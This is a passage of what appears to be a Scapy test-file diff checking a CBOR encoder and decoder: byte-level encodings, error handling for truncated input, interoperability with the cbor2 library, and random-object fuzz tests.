string +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x40') +obj.val == b'' and remainder == b'' + += Decode byte string +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x45hello') +obj.val == b'hello' and remainder == b'' + ++ CBOR Text String + += Encode empty text string +obj = CBOR_TEXT_STRING('') +bytes(obj) == b'\x60' + += Encode text string +obj = CBOR_TEXT_STRING('hello') +bytes(obj) == b'\x65hello' + += Encode UTF-8 text string +obj = CBOR_TEXT_STRING('café') +bytes(obj) == b'\x65caf\xc3\xa9' + += Decode empty text string +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x60') +obj.val == '' and remainder == b'' + += Decode text string +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x65hello') +obj.val == 'hello' and remainder == b'' + += Decode UTF-8 text string +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x65caf\xc3\xa9') +obj.val == 'café' and remainder == b'' + ++ CBOR Simple Values + += Encode false +obj = CBOR_FALSE() +bytes(obj) == b'\xf4' + += Encode true +obj = CBOR_TRUE() +bytes(obj) == b'\xf5' + += Encode null +obj = CBOR_NULL() +bytes(obj) == b'\xf6' + += Encode undefined +obj = CBOR_UNDEFINED() +bytes(obj) == b'\xf7' + += Decode false +obj, remainder = CBOR_Codecs.CBOR.dec(b'\xf4') +isinstance(obj, CBOR_FALSE) and obj.val is False and remainder == b'' + += Decode true +obj, remainder = CBOR_Codecs.CBOR.dec(b'\xf5') +isinstance(obj, CBOR_TRUE) and obj.val is True and remainder == b'' + += Decode null +obj, remainder = CBOR_Codecs.CBOR.dec(b'\xf6') +isinstance(obj, CBOR_NULL) and obj.val is None and remainder == b'' + += Decode undefined +obj, remainder = CBOR_Codecs.CBOR.dec(b'\xf7') +isinstance(obj, CBOR_UNDEFINED) and remainder == b'' + ++ CBOR Float + += Encode double precision float +obj = CBOR_FLOAT(1.5) +bytes(obj) == b'\xfb\x3f\xf8\x00\x00\x00\x00\x00\x00' + += Decode double precision float +obj, remainder = CBOR_Codecs.CBOR.dec(b'\xfb\x3f\xf8\x00\x00\x00\x00\x00\x00') +abs(obj.val - 1.5) < 0.0001 and remainder == b'' + ++ CBOR Array + += Encode empty array +obj = CBOR_ARRAY([]) +bytes(obj) == b'\x80' + += Encode array with integers +from scapy.cbor.cborcodec import CBORcodec_ARRAY +obj = CBOR_ARRAY([CBOR_UNSIGNED_INTEGER(1), CBOR_UNSIGNED_INTEGER(2), CBOR_UNSIGNED_INTEGER(3)]) +bytes(obj) == b'\x83\x01\x02\x03' + += Encode array with Python integers +result = CBORcodec_ARRAY.enc([1, 2, 3]) +result == b'\x83\x01\x02\x03' + += Decode empty array +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x80') +isinstance(obj, CBOR_ARRAY) and obj.val == [] and remainder == b'' + += Decode array with integers +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x83\x01\x02\x03') +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 3 + += Decode nested array +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x82\x01\x82\x02\x03') +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 2 + ++ CBOR Map + += Encode empty map +obj = CBOR_MAP({}) +bytes(obj) == b'\xa0' + += Encode map with string keys +from scapy.cbor.cborcodec import CBORcodec_MAP +result = CBORcodec_MAP.enc({"a": 1, "b": 2}) +result == b'\xa2\x61a\x01\x61b\x02' or result == b'\xa2\x61b\x02\x61a\x01' + += Decode empty map +obj, remainder = CBOR_Codecs.CBOR.dec(b'\xa0') +isinstance(obj, CBOR_MAP) and obj.val == {} and remainder == b'' + += Decode map with integer values +obj, remainder = CBOR_Codecs.CBOR.dec(b'\xa2\x61a\x01\x61b\x02') +isinstance(obj, CBOR_MAP) and len(obj.val) == 2 + ++ CBOR Semantic Tag + += Encode semantic tag (datetime) +obj = CBOR_SEMANTIC_TAG((0, CBOR_TEXT_STRING("2013-03-21T20:04:00Z"))) +bytes(obj) == b'\xc0\x74' + b'2013-03-21T20:04:00Z' + += Decode semantic tag +obj, remainder = CBOR_Codecs.CBOR.dec(b'\xc0\x74' + b'2013-03-21T20:04:00Z') +isinstance(obj, CBOR_SEMANTIC_TAG) and obj.val[0] == 0 and remainder == b'' + ++ CBOR Roundtrip Tests + += Roundtrip unsigned integer +original = CBOR_UNSIGNED_INTEGER(42) +encoded = bytes(original) +decoded, _ = CBOR_Codecs.CBOR.dec(encoded) +decoded.val == original.val + += Roundtrip negative integer +original = CBOR_NEGATIVE_INTEGER(-42) +encoded = bytes(original) +decoded, _ = CBOR_Codecs.CBOR.dec(encoded) +decoded.val == original.val + += Roundtrip byte string +original = CBOR_BYTE_STRING(b'test data') +encoded = bytes(original) +decoded, _ = CBOR_Codecs.CBOR.dec(encoded) +decoded.val == original.val + += Roundtrip text string +original = CBOR_TEXT_STRING('test string') +encoded = bytes(original) +decoded, _ = CBOR_Codecs.CBOR.dec(encoded) +decoded.val == original.val + += Roundtrip array +from scapy.cbor.cborcodec import CBORcodec_ARRAY +encoded = CBORcodec_ARRAY.enc([1, 2, 3, 4, 5]) +decoded, _ = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_ARRAY) and len(decoded.val) == 5 + += Roundtrip map +from scapy.cbor.cborcodec import CBORcodec_MAP +encoded = CBORcodec_MAP.enc({"x": 100, "y": 200}) +decoded, _ = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_MAP) and len(decoded.val) == 2 + ++ CBOR Complex Structures + += Encode nested structure +from scapy.cbor.cborcodec import CBORcodec_MAP +input_dict = { + "name": "John", + "age": 30, + "active": True +} +encoded = CBORcodec_MAP.enc(input_dict) +len(encoded) > 0 + += Decode nested structure +encoded_data = b'\xa3\x64name\x64John\x63age\x18\x1e\x66active\xf5' +obj, remainder = CBOR_Codecs.CBOR.dec(encoded_data) +isinstance(obj, CBOR_MAP) and remainder == b'' + ++ CBOR Error Handling + += Safe decode with invalid data +obj, remainder = CBOR_Codecs.CBOR.safedec(b'\xff\xff\xff') +isinstance(obj, CBOR_DECODING_ERROR) + += Decode with insufficient bytes for length +try: + obj, remainder = CBOR_Codecs.CBOR.dec(b'\x18') + False +except: + True + += Decode byte string with insufficient data +try: + obj, remainder = CBOR_Codecs.CBOR.dec(b'\x45hel') + False +except: + True + +########### CBOR Interoperability Tests with cbor2 ################# +# These tests verify interoperability between scapy's CBOR implementation +# and the standard cbor2 library. cbor2 is ONLY used in tests, not in +# the scapy implementation. +# +# NOTE: These tests require cbor2 to be installed: pip install cbor2 + ++ CBOR Interoperability - Basic Types (Scapy encode, cbor2 decode) + += Check cbor2 availability +try: + import cbor2 + cbor2_available = True +except ImportError: + cbor2_available = False + +cbor2_available + += Interop: Scapy encode unsigned integer, cbor2 decode +import cbor2 +obj = CBOR_UNSIGNED_INTEGER(42) +encoded = bytes(obj) +decoded = cbor2.loads(encoded) +decoded == 42 + += Interop: Scapy encode negative integer, cbor2 decode +obj = CBOR_NEGATIVE_INTEGER(-100) +encoded = bytes(obj) +decoded = cbor2.loads(encoded) +decoded == -100 + += Interop: Scapy encode text string, cbor2 decode +obj = CBOR_TEXT_STRING("Hello, World!") +encoded = bytes(obj) +decoded = cbor2.loads(encoded) +decoded == "Hello, World!" + += Interop: Scapy encode UTF-8 text string, cbor2 decode +obj = CBOR_TEXT_STRING("Café ☕") +encoded = bytes(obj) +decoded = cbor2.loads(encoded) +decoded == "Café ☕" + += Interop: Scapy encode byte string, cbor2 decode +obj = CBOR_BYTE_STRING(b'\x01\x02\x03\x04\x05') +encoded = bytes(obj) +decoded = cbor2.loads(encoded) +decoded == b'\x01\x02\x03\x04\x05' + += Interop: Scapy encode true, cbor2 decode +obj = CBOR_TRUE() +encoded = bytes(obj) +decoded = cbor2.loads(encoded) +decoded is True + += Interop: Scapy encode false, cbor2 decode +obj = CBOR_FALSE() +encoded = bytes(obj) +decoded = cbor2.loads(encoded) +decoded is False + += Interop: Scapy encode null, cbor2 decode +obj = CBOR_NULL() +encoded = bytes(obj) +decoded = cbor2.loads(encoded) +decoded is None + += Interop: Scapy encode undefined, cbor2 decode +obj = CBOR_UNDEFINED() +encoded = bytes(obj) +decoded = cbor2.loads(encoded) +from cbor2 import undefined +decoded is undefined + += Interop: Scapy encode float, cbor2 decode +obj = CBOR_FLOAT(3.14159) +encoded = bytes(obj) +decoded = cbor2.loads(encoded) +abs(decoded - 3.14159) < 0.0001 + ++ CBOR Interoperability - Collections (Scapy encode, cbor2 decode) + += Interop: Scapy encode array, cbor2 decode +from scapy.cbor.cborcodec import CBORcodec_ARRAY +encoded = CBORcodec_ARRAY.enc([1, 2, 3, 4, 5]) +decoded = cbor2.loads(encoded) +decoded == [1, 2, 3, 4, 5] + += Interop: Scapy encode nested array, cbor2 decode +encoded = CBORcodec_ARRAY.enc([1, [2, 3], [4, [5, 6]]]) +decoded = cbor2.loads(encoded) +decoded == [1, [2, 3], [4, [5, 6]]] + += Interop: Scapy encode map, cbor2 decode +from scapy.cbor.cborcodec import CBORcodec_MAP +encoded = CBORcodec_MAP.enc({"a": 1, "b": 2, "c": 3}) +decoded = cbor2.loads(encoded) +decoded == {"a": 1, "b": 2, "c": 3} + += Interop: Scapy encode complex map, cbor2 decode +data = {"name": "Alice", "age": 30, "active": True, "tags": ["user", "admin"]} +encoded = CBORcodec_MAP.enc(data) +decoded = cbor2.loads(encoded) +decoded == data + += Interop: Scapy encode mixed array, cbor2 decode +encoded = CBORcodec_ARRAY.enc([42, "hello", True, None, 3.14, [1, 2]]) +decoded = cbor2.loads(encoded) +len(decoded) == 6 and decoded[0] == 42 and decoded[1] == "hello" + ++ CBOR Interoperability - Basic Types (cbor2 encode, Scapy decode) + += Interop: cbor2 encode unsigned integer, Scapy decode +encoded = cbor2.dumps(42) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +obj.val == 42 and isinstance(obj, CBOR_UNSIGNED_INTEGER) + += Interop: cbor2 encode negative integer, Scapy decode +encoded = cbor2.dumps(-100) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +obj.val == -100 and isinstance(obj, CBOR_NEGATIVE_INTEGER) + += Interop: cbor2 encode text string, Scapy decode +encoded = cbor2.dumps("Hello, World!") +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +obj.val == "Hello, World!" and isinstance(obj, CBOR_TEXT_STRING) + += Interop: cbor2 encode UTF-8 text string, Scapy decode +encoded = cbor2.dumps("Café ☕") +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +obj.val == "Café ☕" and isinstance(obj, CBOR_TEXT_STRING) + += Interop: cbor2 encode byte string, Scapy decode +encoded = cbor2.dumps(b'\x01\x02\x03\x04\x05') +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +obj.val == b'\x01\x02\x03\x04\x05' and isinstance(obj, CBOR_BYTE_STRING) + += Interop: cbor2 encode true, Scapy decode +encoded = cbor2.dumps(True) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +obj.val is True and isinstance(obj, CBOR_TRUE) + += Interop: cbor2 encode false, Scapy decode +encoded = cbor2.dumps(False) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +obj.val is False and isinstance(obj, CBOR_FALSE) + += Interop: cbor2 encode null, Scapy decode +encoded = cbor2.dumps(None) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +obj.val is None and isinstance(obj, CBOR_NULL) + += Interop: cbor2 encode undefined, Scapy decode +from cbor2 import CBORSimpleValue, undefined +encoded = cbor2.dumps(undefined) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(obj, CBOR_UNDEFINED) + += Interop: cbor2 encode float, Scapy decode +encoded = cbor2.dumps(3.14159) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +abs(obj.val - 3.14159) < 0.0001 and isinstance(obj, CBOR_FLOAT) + ++ CBOR Interoperability - Collections (cbor2 encode, Scapy decode) + += Interop: cbor2 encode array, Scapy decode +encoded = cbor2.dumps([1, 2, 3, 4, 5]) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 5 + += Interop: cbor2 encode nested array, Scapy decode +encoded = cbor2.dumps([1, [2, 3], [4, [5, 6]]]) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 3 + += Interop: cbor2 encode map, Scapy decode +encoded = cbor2.dumps({"a": 1, "b": 2, "c": 3}) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(obj, CBOR_MAP) and len(obj.val) == 3 + += Interop: cbor2 encode complex map, Scapy decode +data = {"name": "Alice", "age": 30, "active": True} +encoded = cbor2.dumps(data) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(obj, CBOR_MAP) and "name" in obj.val + += Interop: cbor2 encode mixed array, Scapy decode +encoded = cbor2.dumps([42, "hello", True, None, 3.14]) +obj, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 5 + ++ CBOR Interoperability - Roundtrip Tests + += Interop roundtrip: integer through cbor2 +original_val = 12345 +scapy_obj = CBOR_UNSIGNED_INTEGER(original_val) +scapy_encoded = bytes(scapy_obj) +cbor2_decoded = cbor2.loads(scapy_encoded) +cbor2_encoded = cbor2.dumps(cbor2_decoded) +scapy_decoded, _ = CBOR_Codecs.CBOR.dec(cbor2_encoded) +scapy_decoded.val == original_val + += Interop roundtrip: string through cbor2 +original_val = "Test String 测试" +scapy_obj = CBOR_TEXT_STRING(original_val) +scapy_encoded = bytes(scapy_obj) +cbor2_decoded = cbor2.loads(scapy_encoded) +cbor2_encoded = cbor2.dumps(cbor2_decoded) +scapy_decoded, _ = CBOR_Codecs.CBOR.dec(cbor2_encoded) +scapy_decoded.val == original_val + += Interop roundtrip: array through cbor2 +original_val = [1, "two", 3.0, True, None] +scapy_encoded = CBORcodec_ARRAY.enc(original_val) +cbor2_decoded = cbor2.loads(scapy_encoded) +cbor2_encoded = cbor2.dumps(cbor2_decoded) +scapy_decoded, _ = CBOR_Codecs.CBOR.dec(cbor2_encoded) +isinstance(scapy_decoded, CBOR_ARRAY) and len(scapy_decoded.val) == 5 + += Interop roundtrip: map through cbor2 +original_val = {"int": 42, "str": "value", "bool": True, "null": None} +scapy_encoded = CBORcodec_MAP.enc(original_val) +cbor2_decoded = cbor2.loads(scapy_encoded) +cbor2_encoded = cbor2.dumps(cbor2_decoded) +scapy_decoded, _ = CBOR_Codecs.CBOR.dec(cbor2_encoded) +isinstance(scapy_decoded, CBOR_MAP) and len(scapy_decoded.val) == 4 + ++ CBOR Interoperability - Edge Cases + += Interop: Large unsigned integer +large_int = 18446744073709551615 # 2^64 - 1 +encoded = cbor2.dumps(large_int) +obj, _ = CBOR_Codecs.CBOR.dec(encoded) +obj.val == large_int + += Interop: Very negative integer +neg_int = -18446744073709551616 # -(2^64) +encoded = cbor2.dumps(neg_int) +obj, _ = CBOR_Codecs.CBOR.dec(encoded) +obj.val == neg_int + += Interop: Empty collections +empty_array = cbor2.dumps([]) +obj1, _ = CBOR_Codecs.CBOR.dec(empty_array) +empty_map = cbor2.dumps({}) +obj2, _ = CBOR_Codecs.CBOR.dec(empty_map) +isinstance(obj1, CBOR_ARRAY) and len(obj1.val) == 0 and isinstance(obj2, CBOR_MAP) and len(obj2.val) == 0 + += Interop: Deeply nested structure +deep = {"level1": {"level2": {"level3": {"level4": [1, 2, 3]}}}} +encoded = cbor2.dumps(deep) +obj, _ = CBOR_Codecs.CBOR.dec(encoded) +isinstance(obj, CBOR_MAP) + += Interop: Special float values (infinity) +import math +pos_inf_encoded = cbor2.dumps(math.inf) +pos_inf_obj, _ = CBOR_Codecs.CBOR.dec(pos_inf_encoded) +neg_inf_encoded = cbor2.dumps(-math.inf) +neg_inf_obj, _ = CBOR_Codecs.CBOR.dec(neg_inf_encoded) +math.isinf(pos_inf_obj.val) and math.isinf(neg_inf_obj.val) + += Interop: Special float value (NaN) +nan_encoded = cbor2.dumps(math.nan) +nan_obj, _ = CBOR_Codecs.CBOR.dec(nan_encoded) +math.isnan(nan_obj.val) + += Interop: Zero values +zero_int = cbor2.dumps(0) +zero_float = cbor2.dumps(0.0) +obj1, _ = CBOR_Codecs.CBOR.dec(zero_int) +obj2, _ = CBOR_Codecs.CBOR.dec(zero_float) +obj1.val == 0 and obj2.val == 0.0 + +########### Additional Tests Adapted from PR #4875 ################### +# These tests verify specific encoding sizes and edge cases + ++ CBOR Encoding Sizes - Unsigned Integers + += uint encoding size 0 (argument in initial byte) +obj = CBOR_UNSIGNED_INTEGER(0x12) +data = bytes(obj) +data == bytes.fromhex('12') + += uint encoding size 1 (1-byte argument follows) +obj = CBOR_UNSIGNED_INTEGER(0x34) +data = bytes(obj) +data == bytes.fromhex('1834') + += uint encoding size 2 (2-byte argument follows) +obj = CBOR_UNSIGNED_INTEGER(0x1234) +data = bytes(obj) +data == bytes.fromhex('191234') + += uint encoding size 4 (4-byte argument follows) +obj = CBOR_UNSIGNED_INTEGER(0x12345678) +data = bytes(obj) +data == bytes.fromhex('1a12345678') + += uint encoding size 8 (8-byte argument follows) +obj = CBOR_UNSIGNED_INTEGER(0x1234567812345678) +data = bytes(obj) +data == bytes.fromhex('1b1234567812345678') + += uint decoding size 0 +data = bytes.fromhex('12') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == 18 and remainder == b'' + += uint decoding size 1 +data = bytes.fromhex('1834') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == 0x34 and remainder == b'' + += uint decoding size 2 +data = bytes.fromhex('191234') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == 0x1234 and remainder == b'' + += uint decoding size 4 +data = bytes.fromhex('1a12345678') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == 0x12345678 and remainder == b'' + += uint decoding size 8 +data = bytes.fromhex('1b1234567812345678') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == 0x1234567812345678 and remainder == b'' + ++ CBOR Encoding Sizes - Negative Integers + += nint encoding size 0 +obj = CBOR_NEGATIVE_INTEGER(-0x13) +data = bytes(obj) +data == bytes.fromhex('32') + += nint decoding size 0 +data = bytes.fromhex('32') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == -0x13 and isinstance(obj, CBOR_NEGATIVE_INTEGER) and remainder == b'' + += nint decoding size 2 +data = bytes.fromhex('391234') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == (-0x1234 - 1) and isinstance(obj, CBOR_NEGATIVE_INTEGER) and remainder == b'' + ++ CBOR Byte String Edge Cases + += bstr encoding with specific content +obj = CBOR_BYTE_STRING(b'hi') +data = bytes(obj) +data == bytes.fromhex('426869') + += bstr decoding with specific content +data = bytes.fromhex('426869') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == b'hi' and isinstance(obj, CBOR_BYTE_STRING) and remainder == b'' + += bstr longer content (24 bytes) +content = b'longlonglonglonglonglong' +obj = CBOR_BYTE_STRING(content) +data = bytes(obj) +# Should use 1-byte length encoding (0x58 = major type 2, additional info 24) +data[:2] == bytes.fromhex('5818') and data[2:] == content + += bstr decoding longer content +data = bytes.fromhex('58186c6f6e676c6f6e676c6f6e676c6f6e676c6f6e676c6f6e67') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == b'longlonglonglonglonglong' and remainder == b'' + ++ CBOR Text String Edge Cases + += tstr encoding with specific content +obj = CBOR_TEXT_STRING('hi') +data = bytes(obj) +data == bytes.fromhex('626869') + += tstr decoding with specific content +data = bytes.fromhex('626869') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == 'hi' and isinstance(obj, CBOR_TEXT_STRING) and remainder == b'' + += tstr longer content (24 chars) +content = 'longlonglonglonglonglong' +obj = CBOR_TEXT_STRING(content) +data = bytes(obj) +# Should use 1-byte length encoding (0x78 = major type 3, additional info 24) +data[:2] == bytes.fromhex('7818') and data[2:] == content.encode('utf8') + += tstr decoding longer content +data = bytes.fromhex('78186c6f6e676c6f6e676c6f6e676c6f6e676c6f6e676c6f6e67') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +obj.val == 'longlonglonglonglonglong' and remainder == b'' + ++ CBOR Array Specific Encodings + += array encoding with mixed integer types +from scapy.cbor.cborcodec import CBORcodec_ARRAY +# Array with positive 10 and negative 20 +encoded = CBORcodec_ARRAY.enc([10, -20]) +decoded, _ = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_ARRAY) and len(decoded.val) == 2 + += array decoding specific encoding +data = bytes.fromhex('820A33') # array(2): [10, -20] +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 2 and remainder == b'' + ++ CBOR Map Specific Encodings + += map encoding with integer keys +from scapy.cbor.cborcodec import CBORcodec_MAP +encoded = CBORcodec_MAP.enc({10: -20}) +decoded, _ = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_MAP) and len(decoded.val) == 1 + += map decoding specific encoding +data = bytes.fromhex('A10A33') # map(1): {10: -20} +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_MAP) and len(obj.val) == 1 and remainder == b'' + ++ CBOR Float Specific Encodings + += float64 encoding specific value +obj = CBOR_FLOAT(1.5e20) +data = bytes(obj) +data == bytes.fromhex('FB442043561A882930') + += float64 decoding specific value +data = bytes.fromhex('FB442043561A882930') +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and obj.val == 1.5e20 and remainder == b'' + ++ CBOR Multiple Item Decoding + += decode multiple items in sequence +data = bytes.fromhex('010203') # Three unsigned integers: 1, 2, 3 +obj1, remainder1 = CBOR_Codecs.CBOR.dec(data) +obj2, remainder2 = CBOR_Codecs.CBOR.dec(remainder1) +obj3, remainder3 = CBOR_Codecs.CBOR.dec(remainder2) +obj1.val == 1 and obj2.val == 2 and obj3.val == 3 and remainder3 == b'' + += decode nested array with specific encoding +data = bytes.fromhex('8201820203') # array(2): [1, array(2): [2, 3]] +obj, remainder = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 2 and remainder == b'' and isinstance(obj.val[1], CBOR_ARRAY) + ++ CBOR Boundary Value Tests + += encode maximum value that fits in each size +# Maximum for size 0 (0-23) +obj = CBOR_UNSIGNED_INTEGER(23) +bytes(obj) == bytes.fromhex('17') + += encode minimum value needing size 1 +obj = CBOR_UNSIGNED_INTEGER(24) +bytes(obj) == bytes.fromhex('1818') + += encode maximum value for size 1 +obj = CBOR_UNSIGNED_INTEGER(255) +bytes(obj) == bytes.fromhex('18ff') + += encode minimum value needing size 2 +obj = CBOR_UNSIGNED_INTEGER(256) +bytes(obj) == bytes.fromhex('190100') + += negative integer boundary at -24 +obj = CBOR_NEGATIVE_INTEGER(-24) +bytes(obj) == bytes.fromhex('37') + += negative integer boundary at -25 +obj = CBOR_NEGATIVE_INTEGER(-25) +bytes(obj) == bytes.fromhex('3818') + ++ CBOR Empty Container Tests + += encode empty array +from scapy.cbor.cborcodec import CBORcodec_ARRAY +encoded = CBORcodec_ARRAY.enc([]) +decoded, _ = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_ARRAY) and len(decoded.val) == 0 + += encode empty map +from scapy.cbor.cborcodec import CBORcodec_MAP +encoded = CBORcodec_MAP.enc({}) +decoded, _ = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_MAP) and len(decoded.val) == 0 + += encode empty byte string +obj = CBOR_BYTE_STRING(b'') +data = bytes(obj) +data == bytes.fromhex('40') + += encode empty text string +obj = CBOR_TEXT_STRING('') +data = bytes(obj) +data == bytes.fromhex('60') + +########### CBOR Fuzzing / Random Object Tests #################### + ++ CBOR Random Object Generation + += Create RandCBORObject +from scapy.cbor import RandCBORObject +rand = RandCBORObject() +isinstance(rand, RandCBORObject) + += Generate random CBOR unsigned integer +from scapy.cbor import RandCBORObject, CBOR_UNSIGNED_INTEGER +rand = RandCBORObject(objlist=[CBOR_UNSIGNED_INTEGER]) +obj = rand._fix() +isinstance(obj, CBOR_UNSIGNED_INTEGER) and isinstance(obj.val, int) and obj.val >= 0 + += Generate random CBOR negative integer +from scapy.cbor import RandCBORObject, CBOR_NEGATIVE_INTEGER +rand = RandCBORObject(objlist=[CBOR_NEGATIVE_INTEGER]) +obj = rand._fix() +isinstance(obj, CBOR_NEGATIVE_INTEGER) and isinstance(obj.val, int) and obj.val < 0 + += Generate random CBOR byte string +from scapy.cbor import RandCBORObject, CBOR_BYTE_STRING +rand = RandCBORObject(objlist=[CBOR_BYTE_STRING]) +obj = rand._fix() +isinstance(obj, CBOR_BYTE_STRING) and isinstance(obj.val, bytes) + += Generate random CBOR text string +from scapy.cbor import RandCBORObject, CBOR_TEXT_STRING +rand = RandCBORObject(objlist=[CBOR_TEXT_STRING]) +obj = rand._fix() +isinstance(obj, CBOR_TEXT_STRING) and isinstance(obj.val, str) and len(obj.val) > 0 + += Generate random CBOR array +from scapy.cbor import RandCBORObject, CBOR_ARRAY +rand = RandCBORObject(objlist=[CBOR_ARRAY]) +obj = rand._fix() +isinstance(obj, CBOR_ARRAY) and isinstance(obj.val, list) + += Generate random CBOR map +from scapy.cbor import RandCBORObject, CBOR_MAP +rand = RandCBORObject(objlist=[CBOR_MAP]) +obj = rand._fix() +isinstance(obj, CBOR_MAP) and isinstance(obj.val, dict) + += Generate random CBOR boolean (false) +from scapy.cbor import RandCBORObject, CBOR_FALSE +rand = RandCBORObject(objlist=[CBOR_FALSE]) +obj = rand._fix() +isinstance(obj, CBOR_FALSE) and obj.val == False + += Generate random CBOR boolean (true) +from scapy.cbor import RandCBORObject, CBOR_TRUE +rand = RandCBORObject(objlist=[CBOR_TRUE]) +obj = rand._fix() +isinstance(obj, CBOR_TRUE) and obj.val == True + += Generate random CBOR null +from scapy.cbor import RandCBORObject, CBOR_NULL +rand = RandCBORObject(objlist=[CBOR_NULL]) +obj = rand._fix() +isinstance(obj, CBOR_NULL) and obj.val is None + += Generate random CBOR undefined +from scapy.cbor import RandCBORObject, CBOR_UNDEFINED +rand = RandCBORObject(objlist=[CBOR_UNDEFINED]) +obj = rand._fix() +isinstance(obj, CBOR_UNDEFINED) and obj.val is None + += Generate random CBOR float +from scapy.cbor import RandCBORObject, CBOR_FLOAT +rand = RandCBORObject(objlist=[CBOR_FLOAT]) +obj = rand._fix() +isinstance(obj, CBOR_FLOAT) and isinstance(obj.val, float) + ++ CBOR Random Object Encoding/Decoding + += Encode and decode random unsigned integer +from scapy.cbor import RandCBORObject, CBOR_UNSIGNED_INTEGER, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_UNSIGNED_INTEGER]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_UNSIGNED_INTEGER) and remainder == b'' and decoded.val == obj.val + += Encode and decode random text string +from scapy.cbor import RandCBORObject, CBOR_TEXT_STRING, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_TEXT_STRING]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_TEXT_STRING) and remainder == b'' and decoded.val == obj.val + += Encode and decode random byte string +from scapy.cbor import RandCBORObject, CBOR_BYTE_STRING, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_BYTE_STRING]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_BYTE_STRING) and remainder == b'' and decoded.val == obj.val + += Encode and decode random array +from scapy.cbor import RandCBORObject, CBOR_ARRAY, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_ARRAY]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_ARRAY) and remainder == b'' and len(decoded.val) == len(obj.val) + += Encode and decode random map +from scapy.cbor import RandCBORObject, CBOR_MAP, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_MAP]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_MAP) and remainder == b'' and len(decoded.val) == len(obj.val) + += Encode and decode random float +from scapy.cbor import RandCBORObject, CBOR_FLOAT, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_FLOAT]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_FLOAT) and remainder == b'' + ++ CBOR Random Mixed Types + += Generate multiple random objects of different types +from scapy.cbor import RandCBORObject +rand = RandCBORObject() +objects = [rand._fix() for _ in range(10)] +len(objects) == 10 and all(hasattr(obj, 'val') for obj in objects) + += Encode and decode multiple random objects +from scapy.cbor import RandCBORObject, CBOR_Codecs +rand = RandCBORObject() +success_count = 0 +for _ in range(20): + obj = rand._fix() + try: + encoded = bytes(obj) + decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) + if remainder == b'': + success_count += 1 + except: + pass + +success_count >= 18 + += Random nested arrays encode/decode correctly +from scapy.cbor import RandCBORObject, CBOR_ARRAY, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_ARRAY]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_ARRAY) and remainder == b'' + += Random nested maps encode/decode correctly +from scapy.cbor import RandCBORObject, CBOR_MAP, 